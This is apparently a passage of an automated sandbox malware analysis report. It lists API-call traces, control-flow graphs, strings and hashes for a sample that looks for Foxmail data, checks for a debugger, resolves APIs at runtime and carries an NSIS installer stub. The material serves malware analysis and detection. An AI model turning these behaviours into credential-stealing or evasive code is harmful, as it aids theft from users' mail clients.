                                                                                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1083526818-0
                                                                                                                                                              • Opcode ID: 4fcb23699d83cd092fcdf367eb86b6fb09a20f79e08d1e88fdcd57ede52acf57
                                                                                                                                                              • Instruction ID: b5f84f41700bbe044045ca5e340452736a7b67c81591383fc2f1ae596c6a257c
                                                                                                                                                              • Opcode Fuzzy Hash: 4fcb23699d83cd092fcdf367eb86b6fb09a20f79e08d1e88fdcd57ede52acf57
                                                                                                                                                              • Instruction Fuzzy Hash: 0521A571944308ABD710EB649C48F9F7B9CEF88314F00092AFB98D3190EB34D64587D6

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 36851434
                                                                                                                                                                • Part of subcall function 368510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 36851137
                                                                                                                                                                • Part of subcall function 368510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36851151
                                                                                                                                                                • Part of subcall function 368510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3685115C
                                                                                                                                                                • Part of subcall function 368510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3685116D
                                                                                                                                                                • Part of subcall function 368510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3685117C
                                                                                                                                                                • Part of subcall function 368510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36851193
                                                                                                                                                                • Part of subcall function 368510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 368511D0
                                                                                                                                                                • Part of subcall function 368510F1: FindClose.KERNEL32(00000000), ref: 368511DB
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 368514C5
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 368514E0
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 3685150F
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 36851521
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 36851547
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 36851553
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 36851579
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 36851585
                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 368515AB
                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 368515B7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                              • API String ID: 672098462-2938083778
                                                                                                                                                              • Opcode ID: ca2f002787c8e3aa9a6dfee193a03fed2d6b03c2412a970f5b1bcaba1d967d89
                                                                                                                                                              • Instruction ID: 331be123bfb1f4b5dc6e90d01da8b7d8892196653697c668f4aee5c5565d66c7
                                                                                                                                                              • Opcode Fuzzy Hash: ca2f002787c8e3aa9a6dfee193a03fed2d6b03c2412a970f5b1bcaba1d967d89
                                                                                                                                                              • Instruction Fuzzy Hash: 7981F371A1035CA9DB20CBA5DC45FEF7B39EF88700F0005A6F648E7281EA755A84CF99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(3685C7DD), ref: 3685C7E6
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,3685C7DD), ref: 3685C838
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 3685C860
                                                                                                                                                                • Part of subcall function 3685C803: GetProcAddress.KERNEL32(00000000,3685C7F4), ref: 3685C804
                                                                                                                                                                • Part of subcall function 3685C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3685C7F4,3685C7DD), ref: 3685C816
                                                                                                                                                                • Part of subcall function 3685C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3685C7F4,3685C7DD), ref: 3685C82A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                              • Instruction ID: 7d7e7f92b2a0ed572ae00bcdfe14b207141321f2f527b701a3a72a6359acd6d8
                                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                              • Instruction Fuzzy Hash: E0012244DC57503CBA1042790C01ABE5F989B2F6A1B52175EE32086193CAA0810ECBE7

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 79 3685c7a7-3685c7bc 80 3685c82d 79->80 81 3685c7be-3685c7c6 79->81 82 3685c82f-3685c833 80->82 81->80 83 3685c7c8-3685c7f6 call 3685c7e6 81->83 84 3685c835-3685c83d GetModuleHandleA 82->84 85 3685c872 call 3685c877 82->85 91 3685c86c-3685c86e 83->91 92 3685c7f8 83->92 88 3685c83f-3685c847 84->88 88->88 90 3685c849-3685c84c 88->90 90->82 97 3685c84e-3685c850 90->97 95 3685c866-3685c86b 91->95 96 3685c870 91->96 93 3685c85b-3685c85e 92->93 94 3685c7fa-3685c7fe 92->94 101 3685c85f-3685c860 GetProcAddress 93->101 102 3685c865 94->102 103 3685c800-3685c80b GetProcAddress 94->103 95->91 96->90 99 3685c856-3685c85a 97->99 100 3685c852-3685c854 97->100 99->93 100->101 101->102 102->95 103->80 104 3685c80d-3685c81a VirtualProtect 103->104 105 3685c82c 104->105 106 3685c81c-3685c82a VirtualProtect 104->106 105->80 106->105
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,3685C7DD), ref: 3685C838
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 3685C860
                                                                                                                                                                • Part of subcall function 3685C7E6: GetModuleHandleA.KERNEL32(3685C7DD), ref: 3685C7E6
                                                                                                                                                                • Part of subcall function 3685C7E6: GetProcAddress.KERNEL32(00000000,3685C7F4), ref: 3685C804
                                                                                                                                                                • Part of subcall function 3685C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3685C7F4,3685C7DD), ref: 3685C816
                                                                                                                                                                • Part of subcall function 3685C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3685C7F4,3685C7DD), ref: 3685C82A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                              • Opcode ID: a452ac0e578b87b9c125a1c15392c791f0f01602258e3eee6d5826f2a307e313
                                                                                                                                                              • Instruction ID: 5c8fbe304fd8d35c9f584f53e0a00b02b26510607bff7114dcb2946a9d024594
                                                                                                                                                              • Opcode Fuzzy Hash: a452ac0e578b87b9c125a1c15392c791f0f01602258e3eee6d5826f2a307e313
                                                                                                                                                              • Instruction Fuzzy Hash: DE2129658982816FFB114A794C007AD6FD49B1F3A1F1B069ED350CB143D6A8844DCBE7

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 107 3685c803-3685c80b GetProcAddress 108 3685c82d 107->108 109 3685c80d-3685c81a VirtualProtect 107->109 112 3685c82f-3685c833 108->112 110 3685c82c 109->110 111 3685c81c-3685c82a VirtualProtect 109->111 110->108 111->110 113 3685c835-3685c83d GetModuleHandleA 112->113 114 3685c872 call 3685c877 112->114 116 3685c83f-3685c847 113->116 116->116 117 3685c849-3685c84c 116->117 117->112 118 3685c84e-3685c850 117->118 119 3685c856-3685c85e 118->119 120 3685c852-3685c854 118->120 121 3685c85f-3685c865 GetProcAddress 119->121 120->121 124 3685c866-3685c86e 121->124 126 3685c870 124->126 126->117
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,3685C7F4), ref: 3685C804
                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3685C7F4,3685C7DD), ref: 3685C816
                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3685C7F4,3685C7DD), ref: 3685C82A
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,3685C7DD), ref: 3685C838
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 3685C860
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2152742572-0
                                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                              • Instruction ID: 4c05077fcfa9813c6a9a66f416144cb94d709917d40c1ca49668f60f37583aa6
                                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                              • Instruction Fuzzy Hash: FEF0C2899C57503CFA1145B90C41ABE5FDC8B2F6A1B221A5EE320C7182D995850ECBF7

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 136 403348-403387 SetErrorMode GetVersion 137 403389-403391 call 406500 136->137 138 40339a 136->138 137->138 143 403393 137->143 139 40339f-4033b2 call 406492 lstrlenA 138->139 145 4033b4-4033d0 call 406500 * 3 139->145 143->138 152 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 145->152 153 4033d2-4033d8 145->153 160 403441-403446 152->160 161 40344b-403460 call 405aba CharNextA 152->161 153->152 157 4033da 153->157 157->152 160->161 164 403525-403529 161->164 165 403465-403468 164->165 166 40352f 164->166 167 403470-403478 165->167 168 40346a-40346e 165->168 169 403542-40355c GetTempPathA call 403317 166->169 171 403480-403483 167->171 172 40347a-40347b 167->172 168->167 168->168 178 4035b4-4035ce DeleteFileA call 402ea1 169->178 179 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 169->179 174 403515-403522 call 405aba 171->174 175 403489-40348d 171->175 172->171 174->164 193 403524 174->193 176 4034a5-4034d2 175->176 177 40348f-403495 175->177 183 4034d4-4034da 176->183 184 4034e5-403513 176->184 181 403497-403499 177->181 182 40349b 177->182 195 403662-403672 call 403830 OleUninitialize 178->195 196 4035d4-4035da 178->196 179->178 194 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 179->194 181->176 181->182 182->176 188 4034e0 183->188 189 4034dc-4034de 183->189 184->174 191 403531-40353d call 4060f7 184->191 188->184 189->184 189->188 191->169 193->164 194->178 194->195 206 403796-40379c 195->206 207 403678-403688 call 405813 ExitProcess 195->207 200 403652-40365e call 40390a 196->200 201 4035dc-4035e7 call 405aba 196->201 200->195 210 4035e9-403612 201->210 211 40361d-403627 201->211 213 403818-403820 206->213 214 40379e-4037b7 GetCurrentProcess OpenProcessToken 206->214 215 403614-403616 210->215 218 403629-403636 call 405b7d 211->218 219 40368e-4036a2 call 40577e lstrcatA 211->219 216 403822 213->216 217 403826-40382a ExitProcess 213->217 221 4037e9-4037f7 call 406500 214->221 222 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 214->222 215->211 223 403618-40361b 215->223 216->217 218->195 230 403638-40364e call 4060f7 * 2 218->230 231 4036a4-4036aa lstrcatA 219->231 232 4036af-4036c9 lstrcatA lstrcmpiA 219->232 233 403805-40380f ExitWindowsEx 221->233 234 4037f9-403803 221->234 222->221 223->211 223->215 230->200 231->232 232->195 237 4036cb-4036ce 232->237 233->213 235 403811-403813 call 40140b 233->235 234->233 234->235 235->213 240 4036d0-4036d5 call 4056e4 237->240 241 4036d7 call 405761 237->241 246 4036dc-4036e9 SetCurrentDirectoryA 240->246 241->246 249 4036f6-40371e call 4060f7 246->249 250 4036eb-4036f1 call 4060f7 246->250 254 403724-403740 call 40618a DeleteFileA 249->254 250->249 257 403781-403788 254->257 258 403742-403752 CopyFileA 254->258 257->254 259 40378a-403791 call 405ed6 257->259 258->257 260 403754-403774 call 405ed6 call 40618a call 405796 258->260 259->195 260->257 269 403776-40377d CloseHandle 260->269 269->257
                                                                                                                                                              APIs
                                                                                                                                                              • SetErrorMode.KERNEL32 ref: 0040336D
                                                                                                                                                              • GetVersion.KERNEL32 ref: 00403373
                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                                                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                                                                                                              • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                                                                                                              • GetCommandLineA.KERNEL32(0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                                                                                                              • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                                                                                                              • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                                                                                                              • lstrcatA.KERNEL32(00436400,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                                                                                                              • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                                                                                                              • lstrcatA.KERNEL32(00436400,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000007,00000009,0000000B), ref: 004035A5
                                                                                                                                                              • DeleteFileA.KERNEL32(00436000,?,00000007,00000009,0000000B), ref: 004035B9
                                                                                                                                                                • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                                                                                                • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                                                                                                • Part of subcall function 0040390A: lstrlenA.KERNEL32(0042E3C0,?,?,?,0042E3C0,00000000,00435400,00436000,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                                                                                                                                • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                                                                                                                • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(0042E3C0), ref: 00403A18
                                                                                                                                                                • Part of subcall function 0040390A: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403A61
                                                                                                                                                                • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                                                                                                                • Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                                                                                                              • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403688
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040382A
                                                                                                                                                                • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                                              • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                                                                                                              • API String ID: 3776617018-3619135528
                                                                                                                                                              • Opcode ID: 520eba296a76736c95e98810596d94e1fa3a0794d64f3a9ffa8c42336c5515cb
                                                                                                                                                              • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                                                                                                              • Opcode Fuzzy Hash: 520eba296a76736c95e98810596d94e1fa3a0794d64f3a9ffa8c42336c5515cb
                                                                                                                                                              • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,74DF3410,00436400,00000000), ref: 004058E8
                                                                                                                                                              • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74DF3410,00436400,00000000), ref: 00405930
                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74DF3410,00436400,00000000), ref: 00405951
                                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74DF3410,00436400,00000000), ref: 00405957
                                                                                                                                                              • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,74DF3410,00436400,00000000), ref: 00405968
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                              • String ID: \*.*
                                                                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                                                                              • Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                                                                                                                              • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                                                                                                              • Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                                                                                                                              • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 368561DA
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 368561E4
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 368561F1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                              • Opcode ID: f28cfd5a14ef42e38b319913cf337d37f315174010c43a242189c721724073b0
                                                                                                                                                              • Instruction ID: 83389a6f97d1b4036695f959335ccea74dbbe83db3ccf9b6fa3e9ef2048d9b8a
                                                                                                                                                              • Opcode Fuzzy Hash: f28cfd5a14ef42e38b319913cf337d37f315174010c43a242189c721724073b0
                                                                                                                                                              • Instruction Fuzzy Hash: 9031B37490121C9BCB21DF68D98879DBBB8BF0C311F5041DAEA1CA7260EB349B95CF45
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,36854A8A,?,36862238,0000000C,36854BBD,00000000,00000000,?,36852082,36862108,0000000C,36851F3A,?), ref: 36854AD5
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,36854A8A,?,36862238,0000000C,36854BBD,00000000,00000000,?,36852082,36862108,0000000C,36851F3A,?), ref: 36854ADC
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 36854AEE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                              • Opcode ID: 6dd2d7f8244e0110d03a841092386cca50df5bb83ede295602353dce82312063
                                                                                                                                                              • Instruction ID: c246b4cd0ee56e47468dcb684e86e1f50f574b01f0b9d66bca7210cd06b00600
                                                                                                                                                              • Opcode Fuzzy Hash: 6dd2d7f8244e0110d03a841092386cca50df5bb83ede295602353dce82312063
                                                                                                                                                              • Instruction Fuzzy Hash: 92E0BF35410104AFCF42AF55CD08B5D3B6AEF48355B514015FF15A7121DB39D953CB59
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                              • Opcode ID: 492589bb65a0e548660c399fcc4df713e7fc412eb6eb1016b533fc6aec005789
                                                                                                                                                              • Instruction ID: ae19f0b52d2bfc87ed89340805f889e1d22bed31e75b3c5efcddfe56a9a19f67
                                                                                                                                                              • Opcode Fuzzy Hash: 492589bb65a0e548660c399fcc4df713e7fc412eb6eb1016b533fc6aec005789
                                                                                                                                                              • Instruction Fuzzy Hash: C1A001706012038F97948E35864A30D3AAEAA49695B15616AAB09E5194EBA884529A09

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
